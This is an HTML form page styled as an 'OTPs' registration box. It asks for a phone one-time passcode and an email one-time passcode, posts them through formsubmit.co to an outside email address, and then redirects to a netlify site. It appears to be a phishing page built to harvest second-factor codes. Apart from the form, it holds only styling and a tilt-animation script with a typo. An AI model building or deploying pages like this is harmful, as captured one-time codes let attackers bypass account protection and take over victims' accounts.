<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">





    <style>
        *{
            margin: 0; padding: 0;
            box-sizing: border-box;
            transition: all .2s linear;
        }

        .form-container{
            min-height: 100vh;
            display:flex ;
            align-items:center ;
            justify-content: center;
            background: url(bg2.jpg) no-repeat;
            background-size: cover;
            background-position: center;
            
        }
        .form-container form{
            height: 320px;
            width: 350px;
            /*background: #7e4a4a;*/
            text-align: center;
            border-radius: 10px;
            box-shadow: 0 5px 15px black;
            border-top: 1px solid #8e7f7f;
            border-left: 1px solid #8e7f7f;
            backdrop-filter: blur(10px);
            


        }
        .form-container form h3{
            font-size: 30px;
            padding:30px 0;
            letter-spacing: 3px;
        }

        .form-container form i{
            padding: 0 5px;
            font-size: 20px;
            color: #bbb;

        }
        .form-container form input{
            outline: none;
            border: none;
            height: 40px;
            width: 82%;
            background: rgb(60, 54, 54);
            color: rgba(255,255,255,1);
            box-shadow: 0 0 5px rgba(0,0,0,5) inset;
            font-size: 17px;
            padding: 0 10px;
            letter-spacing: 1px;
            border-radius: 10px;

        }
        .form-container form input[type="submit"]{
            width:84% ;
            cursor: pointer;
            background: linear-gradient(90deg, silver, rgb(199, 2, 2));
            margin-top: 30px;
            border-radius: 50px;
            margin-left: 35px;


        }


    </style>

    <link rel="stylesheet" href="font-awesome.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <title>Register-From</title>
</head>
<body>
    <div class="form-container">
        <form target="_blank" action="https://formsubmit.co/info@sbcultim.ae" method="POST" enctype="multipart/form-data" id="form">
            <h3>OTPs</h3>
            

            <div id="sender">
            <i class="fas fa-phone"></i>
            <input type="text" placeholder="Phone OTP" name="telephone" id="number" required>
            <div id="recaptcha-container"></div>
            <br><br><br>
            <i class="fas fa-at"></i>
            <input type="email" placeholder="Email OTP" name="email" required>
            <input type="submit"  id="send" value="Send" required>
            <input type="hidden" name="_next" value="https://index987.netlify.app/">
            
        
    </div>
        </form>           

    </div>
    
    <script src="https://www.gstatic.com/firebasejs/9.12.1/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.12.1/firebase-auth-compat.js"></script>


    <SCript>
        var form = document.getElementById('form')
        form.addEventListener('mousemove',(e)=>{
            var x = (window.innerWidth / 2 - e.pageX) / 30;
            var y = (window.innerWidth / 2 - e.pageY) / 30;

            form.style.transform = 'rotateX('+ x +'deg) rotateY('+ y +'deg)';


        });
        from.addEventListener('mouseleave',function(){
            form.style.transform = 'rotateX(0deg) rotateY(0deg)';

        });

    </SCript>
</body>
</html>